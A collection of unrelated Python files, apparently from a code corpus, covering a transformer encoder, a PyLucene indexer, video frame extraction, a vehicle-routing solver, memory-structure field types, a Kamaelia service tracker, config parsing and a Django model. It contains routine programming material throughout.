def forward(self, x, mask):
"Follow Figure 1 (left) for connections."
x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))
return self.sublayer[1](x, self.feed_forward)
# INPUT: EMBEDDING AND SOFTMAX
class Embeddings(nn.Module): # source
def __init__(self, numdims, d_model): # , numdims1, numdims2): # numdims can be number of dimensions of scr
super(Embeddings, self).__init__()
self.lut = nn.Linear(numdims, d_model)
self.d_model = d_model
self.dropout = nn.Dropout()
def forward(self, x):
x = x.float()
return self.lut(x) * math.sqrt(self.d_model)
# BASE: ENCODER and a FULLY CONNECTED LAYER
class Encoder_FullyConnected(nn.Module):
"""
A standard Encoder-Decoder architecture. Base for this and many
other models.
"""
def __init__(self, inputdim1, inputdim2, inputdim3, inputdim4, inputdim5, src_embed, encoder, d_model= 8):
super(Encoder_FullyConnected, self).__init__()
print('dims: ', inputdim1, inputdim2, inputdim3, inputdim4, inputdim5)
self.linear1 = nn.Linear(inputdim1, d_model)
self.linear2 = nn.Linear(inputdim2, d_model)
self.linear3 = nn.Linear(inputdim3, d_model)
self.linear4 = nn.Linear(inputdim4, d_model)
self.linear5 = nn.Linear(inputdim5, d_model)
self.src_embed = src_embed
self.encoder = encoder
self.linear = nn.Linear(d_model, 1)
self.pooling = nn.AvgPool1d(5) # pooling window = 5
self.drop = nn.Dropout(0.1)
def forward(self, src1, src2, src3, src4, src5):
"Take in and process masked src and target sequences."
reduced1 = self.linear1(src1)
reduced2 = self.linear2(src2)
reduced3 = self.linear3(src3)
reduced4 = self.linear4(src4)
reduced5 = self.linear5(src5)
src = torch.cat((reduced1, reduced2, reduced3, reduced4, reduced5), dim=1)
temp = self.encoder(src) # shape: batchsize x 5 x d_model
temp_permute = temp.permute(0, 2, 1) # shape: batchsize x d_model x 5
temp2 = self.pooling(temp_permute) # shape: batchsize x d_model x 1
temp3 = self.linear(self.drop(temp2.squeeze(-1)))
return temp3
# FULL MODEL
def make_model(input_dim_1, input_dim_2, input_dim_3, input_dim_4, input_dim_5, N=6, d_model=8, h=8, dropout=0.5):
c = copy.deepcopy
attn = MultiHeadedAttention(h, d_model)
ff = PositionwiseFeedForward(d_model, dropout)
embedding = Embeddings(d_model, d_model)
model = Encoder_FullyConnected(input_dim_1, input_dim_2, input_dim_3, input_dim_4, input_dim_5, nn.Sequential(embedding), Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N), d_model)
return model
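# Minimal smoke test (illustrative only; the five input dimensions below are assumed values):
# build a small encoder-only model and check that a forward pass over random tensors yields
# one score per batch element.
if __name__ == "__main__":
    _model = make_model(16, 16, 16, 16, 16, N=2, d_model=8, h=2)
    _inputs = [torch.randn(4, 1, 16) for _ in range(5)]  # batch of 4, one vector per source
    _out = _model(*_inputs)
    print(_out.shape)  # expected: torch.Size([4, 1])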
|
# Sort the lines in reverse order by the value in the third column
# (note: reorder the lines without modifying their contents).
# Use the sort command to check the result (for this exercise the output does not
# have to match the command's output exactly).
# Verification commands:
# * sort -r -k 3 popular-names.txt
# * diff <(sort -r -k 3 popular-names.txt) <(python 2_18.py)  (run in bash)
columns_tuple_list = []
with open('popular-names.txt') as f:
for line in f.readlines():
columns = line.split('\t')
columns_tuple_list.append((columns[2], line))
sorted_columns = sorted(
columns_tuple_list, key=lambda x: x[0], reverse=True)
for _, c in sorted_columns:
print(c, end='')
|
# -*- coding: utf-8 -*-
#
# Copyright 2008 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
"""
interface for the pylucene (v1.x) indexing engine
take a look at PyLuceneIndexer.py for PyLucene v2.x support
"""
# this module is based on PyLuceneIndexer (for PyLucene v2.x)
import PyLuceneIndexer
import PyLucene
def is_available():
return PyLuceneIndexer._get_pylucene_version() == 1
class PyLuceneDatabase(PyLuceneIndexer.PyLuceneDatabase):
"""manage and use a pylucene indexing database"""
def _create_query_for_string(self, text, require_all=True,
analyzer=None):
"""generate a query for a plain term of a string query
basically this function parses the string and returns the resulting
query
:param text: The query string
:type text: str
:param require_all: boolean operator
(True -> AND (default) / False -> OR)
:type require_all: bool
:param analyzer: The analyzer to be used
Possible analyzers are:
- :attr:`CommonDatabase.ANALYZER_TOKENIZE`
              the field value is split to be matched word-wise
- :attr:`CommonDatabase.ANALYZER_PARTIAL`
the field value must start with the query string
- :attr:`CommonDatabase.ANALYZER_EXACT`
keep special characters and the like
:type analyzer: bool
:return: resulting query object
:rtype: PyLucene.Query
"""
if analyzer is None:
analyzer = self.analyzer
if analyzer == self.ANALYZER_EXACT:
# exact matching - no substitution ...
# for PyLucene: nothing special is necessary
pass
# don't care about special characters ...
if analyzer == self.ANALYZER_EXACT:
analyzer_obj = self.ExactAnalyzer()
else:
text = _escape_term_value(text)
analyzer_obj = PyLucene.StandardAnalyzer()
qp = PyLucene.QueryParser(analyzer=analyzer_obj)
if require_all:
qp.setDefaultOperator(qp.Operator.AND)
else:
qp.setDefaultOperator(qp.Operator.OR)
if (analyzer & self.ANALYZER_PARTIAL) > 0:
# PyLucene uses explicit wildcards for partial matching
text += "*"
return qp.parse(text)
def _create_query_for_field(self, field, value, analyzer=None):
"""Generate a field query.
This functions creates a field->value query.
:param field: The fieldname to be used
:type field: str
:param value: The wanted value of the field
:type value: str
:param analyzer: The analyzer to be used
Possible analyzers are:
- :attr:`CommonDatabase.ANALYZER_TOKENIZE`
              the field value is split to be matched word-wise
- :attr:`CommonDatabase.ANALYZER_PARTIAL`
the field value must start with the query string
- :attr:`CommonDatabase.ANALYZER_EXACT`
keep special characters and the like
:type analyzer: bool
:return: Resulting query object
:rtype: PyLucene.Query
"""
if analyzer is None:
analyzer = self.analyzer
if analyzer == self.ANALYZER_EXACT:
analyzer_obj = self.ExactAnalyzer()
else:
value = _escape_term_value(value)
analyzer_obj = PyLucene.StandardAnalyzer()
if (analyzer & self.ANALYZER_PARTIAL) > 0:
# PyLucene uses explicit wildcards for partial matching
value += "*"
return PyLucene.QueryParser.parse(value, field, analyzer_obj)
def _create_query_combined(self, queries, require_all=True):
"""generate a combined query
:param queries: list of the original queries
:type queries: list of xapian.Query
:param require_all: boolean operator
(True -> AND (default) / False -> OR)
:type require_all: bool
:return: the resulting combined query object
:rtype: PyLucene.Query
"""
combined_query = PyLucene.BooleanQuery()
for query in queries:
combined_query.add(
PyLucene.BooleanClause(query, require_all, False))
return combined_query
def _add_plain_term(self, document, term, tokenize=True):
"""add a term to a document
:param document: the document to be changed
:type document: xapian.Document | PyLucene.Document
:param term: a single term to be added
:type term: str
:param tokenize: should the term be tokenized automatically
:type tokenize: bool
"""
# Field parameters: name, string, store, index, token
        document.add(PyLucene.Field(str(PyLuceneIndexer.UNNAMED_FIELD_NAME), term,
True, True, tokenize))
def _add_field_term(self, document, field, term, tokenize=True):
"""add a field term to a document
:param document: the document to be changed
:type document: xapian.Document | PyLucene.Document
:param field: name of the field
:type field: str
:param term: term to be associated to the field
:type term: str
:param tokenize: should the term be tokenized automatically
:type tokenize: bool
"""
# TODO: decoding (utf-8) is missing
# Field parameters: name, string, store, index, token
document.add(PyLucene.Field(str(field), term,
True, True, tokenize))
def get_query_result(self, query):
"""return an object containing the results of a query
:param query: a pre-compiled query
:type query: a query object of the real implementation
:return: an object that allows access to the results
:rtype: subclass of CommonEnquire
"""
return PyLucene.indexSearcher.search(query)
def search(self, query, fieldnames):
"""return a list of the contents of specified fields for all matches of
a query
:param query: the query to be issued
:type query: a query object of the real implementation
:param fieldnames: the name(s) of a field of the document content
:type fieldnames: string | list of strings
:return: a list of dicts containing the specified field(s)
:rtype: list of dicts
"""
if isinstance(fieldnames, basestring):
fieldnames = [fieldnames]
hits = PyLucene.indexSearcher.search(query)
result = []
for hit, doc in hits:
fields = {}
for fieldname in fieldnames:
content = doc.get(fieldname)
                if content is not None:
fields[fieldname] = content
result.append(fields)
return result
def _writer_open(self):
"""open write access for the indexing database and acquire an
exclusive lock
"""
        super(PyLuceneDatabase, self)._writer_open()
self.writer.maxFieldLength = PyLuceneIndexer.MAX_FIELD_SIZE
|
import sys
from path import args
sys.path.insert(0, str(args.root_path))
from options import opt
from pathlib import Path
import os
import cv2
def strip_txt_file(txt_file, cam_dict):
_file = open(txt_file,'r')
lines = _file.readlines()
for line in lines:
line = line.strip()
ele = line.split(' ',1)
cam_dict[ele[0]]=int(ele[1])
return cam_dict
def read_cam_frame(train_S_list, valid_S_list, test_S_list):
cam_framenum = Path(opt.raw_data_path).joinpath('cam_framenum')
train_cam_framenum = {}
valid_cam_framenum={}
test_cam_framenum={}
for S_txt in os.listdir(cam_framenum):
S_txt_path = cam_framenum.joinpath(S_txt)
if S_txt[:-4] in train_S_list:
train_cam_framenum = strip_txt_file(S_txt_path, train_cam_framenum)
elif S_txt[:-4] in valid_S_list:
valid_cam_framenum = strip_txt_file(S_txt_path, valid_cam_framenum)
elif S_txt[:-4] in test_S_list:
test_cam_framenum = strip_txt_file(S_txt_path, test_cam_framenum)
return train_cam_framenum, valid_cam_framenum, test_cam_framenum
def gen_frame(_folder):
print(_folder + " start")
frame_dir = Path(opt.data_root).joinpath('frames').joinpath(_folder+'_frame')
if _folder == 'valid':
_folder = 'validation'
for S_folder in Path(opt.raw_data_path).joinpath(_folder).glob('*'):
for camid in os.listdir(S_folder):
cam_vid = S_folder.joinpath(camid).joinpath('vdo.avi')
cap = cv2.VideoCapture(str(cam_vid))
success,image = cap.read()
cnt = 0
while success:
frame_name = camid + '_' + str(cnt).zfill(4)
img_path = Path(frame_dir).joinpath(frame_name+'.jpg')
cv2.imwrite(str(img_path),image)
success,image = cap.read()
cnt += 1
print(camid + ' finished')
print(_folder + " complete\n")
if __name__ == '__main__':
train_S_list = ['S01', 'S03', 'S04', 'S05']
valid_S_list = ['S02']
test_S_list = ['S06']
train_cam_framenum, valid_cam_framenum, test_cam_framenum = read_cam_frame(train_S_list, valid_S_list, test_S_list)
gen_frame('train')
gen_frame('valid')
gen_frame('test')
# gt: [frame, ID, left, top, width, height, 1, -1, -1, -1]
|
def count_substring(s, sub_string):
count = 0
l = len(sub_string)
for i in range(len(s)-l+1):
if s[i:i+l]==sub_string:
count+=1
return count
if __name__ == '__main__':
    # Minimal driver (assumed I/O format, Python 3): read the string and the substring,
    # then print the count, e.g. count_substring('ABCDCDC', 'CDC') == 2.
    s = input()
    sub_string = input()
    print(count_substring(s, sub_string))
|
import os
print(list(range(0, 11)))
print([x * x for x in range(1, 11)])
print([x * x for x in range(1, 11) if x % 2 == 0])
print([m + n for m in 'ABC' for n in 'XYZ'])
print([d for d in os.listdir('.')])
d = {'x': 'A', 'y': 'B', 'z': 'C' }
for k, v in d.items():
print(k, '=', v)
print([k + '=' + v for k, v in d.items()])
L = ['Hello', 'World', 'IBM', 'Apple']
print([s.lower() for s in L])
|
# from data.text2json2 import BASE_DIR
import numpy as np
import json
import io
import matplotlib.pyplot as plt
import random
class Solomon:
"""This class encapsulates the VRPTW problem
"""
def __init__(self, problemName, number=1000):
"""
Creates an instance of a Solomon problem
        :param problemName: name of the problem instance to load
"""
# initialize instance variables:
self.name = problemName
self.locations = []
self.distances = []
self.number = number
self.capacity = 0
self.LATE_PENALTY = 100 # per unit
self.LOAD_PENALTY = 1000 # per unit
self.sequenced = {}
self.metaChromosome = []
# initialize the data:
self.__initData()
def __len__(self):
"""
        returns the number of locations in the problem (including the depot)
        :return: the number of locations
"""
return len(self.locations)
def __initData(self):
DATA_DIR = "./data/json/"
# attempt to read json data:
obj = None
with io.open(DATA_DIR + self.name + ".json", 'rt', newline='') as file_object:
obj = json.load(file_object)
if obj != None and self.name == obj['name']:
self.locations = obj['locs']
self.distances = obj['dist']
self.number = min(obj['number'], self.number)
self.capacity = obj['capacity']
# print(obj["name"], locs[0], locs[99], dist[0][99])
def plotData(self, solution=[], centroids=[], label=False):
"""plots the path described by the given indices of the cities
        :param solution: a list of routes (each a list of location indices) to draw.
        :param centroids: optional cluster centroids to mark on the plot.
        :param label: if True, annotate each location with its index.
:return: the resulting plot
"""
plt.figure(0)
np.random.seed(42)
x = [l['x'] for l in self.locations]
y = [l['y'] for l in self.locations]
colors = np.random.rand(len(self.locations))
# colors[0] = 10.0
area = [10 + (l['demand'] * 2) for l in self.locations]
plt.scatter(x, y, s=area, c=colors, alpha=0.7)
plt.scatter([x[0]], [y[0]], marker="s") # show the depot as a square
if label:
for i, (xi, yi) in enumerate(zip(x, y)):
plt.annotate(str(i), (xi, yi))
plt.title(self.calcScore(solution))
for truck in solution:
if truck[0] != 0:
truck.insert(0, 0)
if truck[-1] != 0:
truck.append(0)
xs = [self.locations[i]['x'] for i in truck]
ys = [self.locations[i]['y'] for i in truck]
# plot a line between each pair of consecutive cities:
plt.plot(xs, ys)
if len(centroids) > 0:
plt.scatter(centroids[:, 0], centroids[:, 1],
marker="+") # the centroid as a +
plt.show()
return plt
def calcTruckScore(self, truck):
p = 0
time = 0
load = 0
total_penalty = 0
total_dist = 0
for q in truck + [0]:
dist = self.distances[p][q]
total_dist += dist
time += dist
load += self.locations[q]['demand']
late = time - self.locations[q]['end']
if late > 0:
# print(f"late by {late} between {p} and {q}")
total_penalty += self.LATE_PENALTY * late
if time < self.locations[q]['start']:
time = self.locations[q]['start']
time = time + self.locations[q]['service']
p = q
# print("time:", q, time)
if load > self.capacity:
total_penalty += self.LOAD_PENALTY * (load - self.capacity)
return total_dist + total_penalty
def calcScore(self, trucks: list, penalize=False):
return sum([self.calcTruckScore(t) for t in trucks])
def findClusters(self):
from sklearn.cluster import KMeans
# import numpy as np
points = [[float(l['x']), float(l['y'])] for l in self.locations[1:]]
kmeans = KMeans(n_clusters=self.number, random_state=0).fit(points)
labels = kmeans.labels_
# clusters = kmeans.cluster_centers_
# self.plotData(centroids=clusters)
return labels
def findNeighbours(self, truck, trucks, D, N):
outerpoints = set(range(len(self.locations))) - set(truck)
# [p for p in range(len(self.locations)) if p not in truck]
neighbours = {}
for c in truck:
if c == 0:
continue
cx, cy = self.locations[c]['x'], self.locations[c]['y']
# fast distance check:
for d in outerpoints:
if d == 0:
continue
dx, dy = self.locations[d]['x'], self.locations[d]['y']
if np.absolute(dx - cx) <= D or np.absolute(dy - cy) <= D:
nbr = 0
for j, t in enumerate(trucks):
if d in t:
nbr = j
break
neighbours[nbr] = neighbours.get(nbr, 0) + 1
# nrs = random.choices(list(neighbours.keys()), weights=list(neighbours.values()), k=N)
nrs = []
if len(neighbours) < N:
nrs = list(neighbours.keys())
else:
nrs = random.sample(list(neighbours.keys()), k=N)
return nrs
def findAnchor(self, trucks: list):
scores = [(i, self.calcTruckScore(t)) for i, t in enumerate(trucks)]
scores.sort(key=lambda x: x[1], reverse=True)
w = random.sample(scores[:3], k=1)
return w[0][0]
# ---- random anchor selection
# worsttruck = random.sample(range(len(trucks)), k=1)
# return worsttruck[0]
def getChromosomeFromSolution(self, trucks):
self.metaChromosome = [-1] * len(self.locations)
for i, truck in enumerate(trucks):
for l in truck:
self.metaChromosome[l] = i
ret = [i for i in self.metaChromosome if i > -1]
return ret
def getSolutionFromChromosome(self, chromosome):
if self.metaChromosome == [] or len(chromosome) + 1 == len(self):
self.metaChromosome = [-1] + list(chromosome)
trucks = {}
locations = [i for i, t in enumerate(
self.metaChromosome) if t > -1]
# print("getSolutionFromChromosome", locations)
for i, t in enumerate(chromosome):
if t not in trucks:
trucks[t] = []
trucks[t].append(locations[i])
return trucks.values()
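# Usage sketch (assumes an instance file exists at ./data/json/<name>.json, e.g. the classic
# Solomon benchmark "C101"); a score is total distance plus lateness/overload penalties:
#     problem = Solomon("C101", number=10)
#     routes = [[1, 2, 3], [4, 5]]     # two illustrative routes of customer indices
#     print(problem.calcScore(routes))
#     problem.plotData(solution=routes)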
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Loic Jaquemet loic.jaquemet+python@gmail.com
#
import logging
import ctypes
from haystack.reverse import config
from haystack.reverse import structure
"""
the Python classes to represent the guesswork record and field typing of
allocations.
"""
log = logging.getLogger('field')
# Field related functions and classes
class FieldType(object):
"""
Represents the type of a field.
"""
types = set()
def __init__(self, _id, _name, _signature):
self.__id = _id
self.__name = _name
self.__sig = _signature
@property
def id(self):
return self.__id
@property
def name(self):
return self.__name
@property
def signature(self):
return self.__sig
def __cmp__(self, other):
try:
return cmp(self.id, other.id)
except AttributeError as e:
return -1
def __hash__(self):
return hash(self.id)
def __str__(self):
return '<FieldType %s>' % self.name
def __repr__(self):
return '<t:%s>' % self.name
class FieldTypeStruct(FieldType):
"""
    Fields that are known, independent structures.
In case we reverse a Big record that has members of known record types.
"""
def __init__(self, _typename):
assert isinstance(_typename, str)
super(FieldTypeStruct, self).__init__(0x1, _typename, 'K')
def __str__(self):
return self.name
class FieldTypeArray(FieldType):
"""
An array type
"""
def __init__(self, item_type, item_size, nb_items):
super(FieldTypeArray, self).__init__(0x60, '%s*%d' % (item_type.name, nb_items), 'a')
self.nb_items = nb_items
self.item_type = item_type
self.item_size = item_size
self.size = item_size*nb_items
class RecordTypePointer(FieldType):
def __init__(self, _type):
#if typ == STRING:
# return STRING_POINTER
super(RecordTypePointer, self).__init__(_type.id + 0xa, 'ctypes.POINTER(%s)' % _type.name, 'P')
# setup all the know types that are interesting to us
UNKNOWN = FieldType(0x0, 'ctypes.c_ubyte', 'u')
STRUCT = FieldType(0x1, 'Structure', 'K')
ZEROES = FieldType(0x2, 'ctypes.c_ubyte', 'z')
STRING = FieldType(0x4, 'ctypes.c_char', 'T')
STRING16 = FieldType(0x14, 'ctypes.c_char', 'T')
STRINGNULL = FieldType(0x6, 'ctypes.c_char', 'T')
STRING_POINTER = FieldType(0x4 + 0xa, 'ctypes.c_char_p', 's')
INTEGER = FieldType(0x18, 'ctypes.c_uint', 'I')
SMALLINT = FieldType(0x8, 'ctypes.c_uint', 'i')
SIGNED_SMALLINT = FieldType(0x28, 'ctypes.c_int', 'i')
ARRAY = FieldType(0x40, 'Array', 'a')
BYTEARRAY = FieldType(0x50, 'ctypes.c_ubyte', 'a')
# ARRAY_CHAR_P = FieldType(0x9, 'array_char_p', 'ctypes.c_char_p', 'Sp')
POINTER = FieldType(0xa, 'ctypes.c_void_p', 'P')
PADDING = FieldType(0xff, 'ctypes.c_ubyte', 'X')
class Field(object):
"""
Class that represent a Field instance, a FieldType instance.
"""
def __init__(self, name, offset, _type, size, is_padding):
self.__name = name
self.__offset = offset
assert isinstance(_type, FieldType)
self.__field_type = _type
self.__size = size
self.__padding = is_padding
self.__comment = '#'
@property
def name(self):
return self.__name
@name.setter
def name(self, _name):
if _name is None:
self.__name = '%s_%s' % (self.field_type.name, self.offset)
else:
self.__name = _name
@property
def offset(self):
return self.__offset
@property
def field_type(self):
return self.__field_type
@property
def size(self):
return self.__size
@property
def padding(self):
return self.__padding
@property
def comment(self):
return self.__comment
@comment.setter
def comment(self, txt):
self.__comment = '# %s' % txt
def is_string(self): # null terminated
return self.field_type in [STRING, STRING16, STRINGNULL, STRING_POINTER]
def is_pointer(self):
# we could be a pointer or a pointer string
return issubclass(self.__class__, PointerField)
def is_zeroes(self):
return self.field_type == ZEROES
def is_array(self): # will be overloaded
return self.field_type == ARRAY or self.field_type == BYTEARRAY
def is_integer(self):
return self.field_type == INTEGER or self.field_type == SMALLINT or self.field_type == SIGNED_SMALLINT
def is_record(self):
return self.field_type == STRUCT
def is_gap(self):
return self.field_type == UNKNOWN
def get_typename(self):
if self.is_string() or self.is_zeroes():
return '%s*%d' % (self.field_type.name, len(self))
elif self.is_array():
# TODO should be in type
return '%s*%d' % (self.field_type.name, len(self) / self.nb_items)
elif self.field_type == UNKNOWN:
return '%s*%d' % (self.field_type.name, len(self))
return self.field_type.name
def __hash__(self):
return hash((self.offset, self.size, self.field_type))
def __cmp__(self, other):
# XXX : Perf... cmp sux
try:
if self.offset < other.offset:
return -1
elif self.offset > other.offset:
return 1
elif (self.offset, self.size, self.field_type) == (other.offset, other.size, other.field_type):
return 0
# last chance, expensive cmp
return cmp((self.offset, self.size, self.field_type),
(other.offset, other.size, other.field_type))
except AttributeError as e:
# if not isinstance(other, Field):
return -1
def __len__(self):
return int(self.size) # some long come and goes
def __repr__(self):
return str(self)
def __str__(self):
return '<Field offset:%d size:%s t:%s>' % (self.offset, self.size, self.field_type)
def get_signature(self):
return self.field_type, self.size
def to_string(self, value):
if value is None:
value = 0
if self.is_pointer():
comment = '# @ 0x%0.8x %s' % (value, self.comment)
elif self.is_integer():
comment = '# 0x%x %s' % (value, self.comment)
elif self.is_zeroes():
comment = '''# %s zeroes: '\\x00'*%d''' % (self.comment, len(self))
elif self.is_string():
comment = '# %s %s: %s' % (self.comment, self.field_type.name, value)
elif self.is_record():
comment = '#'
else:
# unknown
comment = '# %s else bytes:%s' % (self.comment, repr(value))
# prep the string
fstr = "( '%s' , %s ), %s\n" % (self.name, self.get_typename(), comment)
return fstr
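# Illustrative use of the field types above (hypothetical offset/size): a 4-byte unsigned
# integer field at offset 0x10 of a reversed record.
#     f = Field('int_at_0x10', 0x10, INTEGER, 4, False)
#     f.is_integer()    # True
#     f.get_typename()  # 'ctypes.c_uint'
#     len(f)            # 4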
class PointerField(Field):
"""
represent a pointer field
"""
def __init__(self, name, offset, size):
super(PointerField, self).__init__(name, offset, POINTER, size, False)
self.__pointee = None
        self.__pointer_to_ext_lib = False
        # ??
self._child_addr = 0
self._child_desc = None
self._child_type = None
@property
def pointee(self):
return self.__pointee
@pointee.setter
def pointee(self, pointee_field):
self.__pointee = pointee_field
def is_pointer_to_string(self):
# if hasattr(self, '_ptr_to_ext_lib'):
# return False
return self.pointee.is_string()
def is_pointer_to_ext_lib(self):
return self.__pointer_to_ext_lib
def set_pointer_to_ext_lib(self):
self.__pointer_to_ext_lib = True
def set_pointee_addr(self, addr):
self._child_addr = addr
def set_pointee_desc(self, desc):
self._child_desc = desc
def set_pointee_ctype(self, _type):
self._child_type = _type
class ArrayField(Field):
"""
Represents an array field.
"""
# , basicTypename, basicTypeSize ): # use first element to get that info
def __init__(self, name, offset, item_type, item_size, nb_item):
size = item_size * nb_item
super(ArrayField, self).__init__(name, offset, FieldTypeArray(item_type, item_size, nb_item), size, False)
def get_typename(self):
return self.field_type.name
def is_array(self):
return True
def _get_value(self, _record, maxLen=120):
return None
def to_string(self, _record, prefix=''):
item_type = self.field_type.item_type
# log.debug('P:%s I:%s Z:%s typ:%s' % (item_type.is_pointer(), item_type.is_integer(), item_type.is_zeroes(), item_type.name))
log.debug("array type: %s", item_type.name)
#
comment = '# %s array' % self.comment
fstr = "%s( '%s' , %s ), %s\n" % (prefix, self.name, self.get_typename(), comment)
return fstr
class ZeroField(ArrayField):
"""
Represents an array field of zeroes.
"""
def __init__(self, name, offset, nb_item):
super(ZeroField, self).__init__(name, offset, ZEROES, 1, nb_item)
def is_zeroes(self):
return True
class RecordField(Field, structure.AnonymousRecord):
"""
make a record field
"""
def __init__(self, parent, offset, field_name, field_type, fields):
size = sum([len(f) for f in fields])
_address = parent.address + offset
structure.AnonymousRecord.__init__(self, parent._memory_handler, _address, size, prefix=None)
Field.__init__(self, field_name, offset, FieldTypeStruct(field_type), size, False)
structure.AnonymousRecord.set_name(self, field_name)
#structure.AnonymousRecord.add_fields(self, fields)
_record_type = structure.RecordType(field_type, size,fields)
self.set_record_type(_record_type)
return
def get_typename(self):
return '%s' % self.field_type
@property
def address(self):
raise NotImplementedError('You cannot call address on a subrecord')
# def to_string(self, *args):
# # print self.fields
# fieldsString = '[ \n%s ]' % (''.join([field.to_string(self, '\t') for field in self.get_fields()]))
# info = 'rlevel:%d SIG:%s size:%d' % (self.get_reverse_level(), self.get_signature(), len(self))
# ctypes_def = '''
#class %s(ctypes.Structure): # %s
# _fields_ = %s
#
#''' % (self.name, info, fieldsString)
# return ctypes_def
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# experiment in ways to do services
import Axon.Component
from Axon.Ipc import shutdownMicroprocess
class ServiceTracker(object):
def __init__(self):
super(ServiceTracker,self).__init__()
self.services = {}
self.serviceUsageHandles = {}
def setupService(self, name, componentFactory, inboxname):
self.services[name] = { "factory" : componentFactory,
"inboxname" : inboxname,
"refcount" : 0,
}
def _acquireService(self, caller, name):
try:
service = self.services[name]
except KeyError:
            raise KeyError("NO SUCH SERVICE AVAILABLE")
if service['refcount'] == 0:
# need to start the service
service['instance'] = service['factory']()
service['instance'].activate(caller.scheduler)
instance = service['instance']
service['refcount'] += 1
newhandle = object()
self.serviceUsageHandles[newhandle] = name
return (newhandle, (instance, service['inboxname']))
def _releaseService(self, handle):
try:
name = self.serviceUsageHandles[handle]
except KeyError:
            raise KeyError("NO SUCH HANDLE")
del self.serviceUsageHandles[handle]
service = self.services[name]
service['refcount'] -= 1
if service['refcount'] == 0:
service['instance']._deliver(shutdownMicroprocess(), "control")
del service['instance']
GLOBAL_TRACKER = ServiceTracker()
# modify the existing Axon.Component.component
# ... bit messy I know, but hey!
__component_old___init__ = Axon.Component.component.__init__
__component_old__closeDownMicroprocess = Axon.Component.component._closeDownMicroprocess
def __component_new___init__(self):
__component_old___init__(self)
del self.tracker
self.tracker = GLOBAL_TRACKER
self.service_handles = []
def __component_new_acquireService(self,name):
handle, service = self.tracker._acquireService(self, name)
self.service_handles.append(handle)
return handle, service
def __component_new_releaseService(self,handle):
self.service_handles.remove(handle)
return self.tracker._releaseService(handle)
def __component_new__closeDownMicroprocess(self):
for handle in self.service_handles:
self.tracker._releaseService(handle)
return __component_old__closeDownMicroprocess(self)
Axon.Component.component.__init__ = __component_new___init__
Axon.Component.component.acquireService = __component_new_acquireService
Axon.Component.component.releaseService = __component_new_releaseService
Axon.Component.component._closeDownMicroprocess = __component_new__closeDownMicroprocess
from Axon.Component import component
# ---------------------
# now some test code
from Axon.AdaptiveCommsComponent import AdaptiveCommsComponent
class CharGen(AdaptiveCommsComponent):
Inboxes = {"inbox":"",
"control":"",
"request":"Requests for subscriptions",
}
def main(self):
self.destinations = {}
self.linkages = {}
print "Service started"
while not self.dataReady("control"):
while self.dataReady("request"):
cmd = self.recv("request")
self.handleCommand(cmd)
for outboxname in self.destinations.values():
self.send(len(self.destinations),outboxname)
yield 1
print "Service shutdown"
def handleCommand(self,cmd):
if cmd[0]=="ADD":
_, dest = cmd[1:3]
outboxname = self.addOutbox("outbox")
self.destinations[dest] = outboxname
self.linkages[dest] = self.link((self,outboxname),dest)
elif cmd[0]=="REMOVE":
_, dest = cmd[1:3]
self.unlink( thelinkage=self.linkages[dest] )
self.deleteOutbox( self.destinations[dest] )
del self.linkages[dest]
del self.destinations[dest]
class ServiceUser(component):
def __init__(self, servicename,startwhen,count):
super(ServiceUser,self).__init__()
self.servicename = servicename
self.startwhen = startwhen
self.count = count
def main(self):
n=self.startwhen
while n>0:
yield 1
n-=1
service_handle, service = self.acquireService(self.servicename)
linkage = self.link((self,"outbox"),service)
self.send(("ADD",None,(self,"inbox")), "outbox")
print "Registering"
n=self.count
while n>0:
while self.dataReady("inbox"):
msg=self.recv("inbox")
print msg,
n=n-1
self.pause()
yield 1
self.send(("REMOVE",None,(self,"inbox")), "outbox")
print "Deregistering"
self.unlink(linkage)
# self.releaseService(service_handle) # not needed, as the component tracks this
GLOBAL_TRACKER.setupService("TEST",CharGen,"request")
ServiceUser("TEST",0,10).activate()
ServiceUser("TEST",0,5).activate()
ServiceUser("TEST",0,20).activate()
ServiceUser("TEST",50,10).activate()
ServiceUser("TEST",55,10).run()
|
import argparse
import configparser
import sys
def parse():
""" Parse config file, update with command line arguments
"""
# defaults arguments
defaults = { "stratfile":"strat.txt"}
# Parse any conf_file specification
conf_parser = argparse.ArgumentParser(
description=__doc__, # printed with -h/--help
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
# Turn off help, so we print all options in response to -h
add_help=False
)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args()
if args.conf_file:
config = configparser.ConfigParser()
config.read([args.conf_file])
defaults.update(dict(config.items("Defaults")))
# Parse rest of arguments
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser]
)
parser.set_defaults(**defaults)
parser.add_argument("--stratfile", help="""File containing the Backtrace strings.
""")
args = parser.parse_args(remaining_argv)
return args
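# Example invocation (hypothetical file names): values from the [Defaults] section of the
# config file override the built-in defaults, and explicit flags override both, e.g.
#     python run.py -c my.conf --stratfile other_strat.txt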
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
import datetime
class ArtistProfile(models.Model):
"""
The user, or 'artist' profile. Contains the django.contrib.auth.models.User
instance and other fields.
"""
user = models.OneToOneField(User)
avatar = models.ImageField(default='/art/placeholder.jpg')
join_date = models.DateField('date joined', default=timezone.now)
bio = models.TextField(max_length=250, default='')
def __str__(self):
return self.user.username
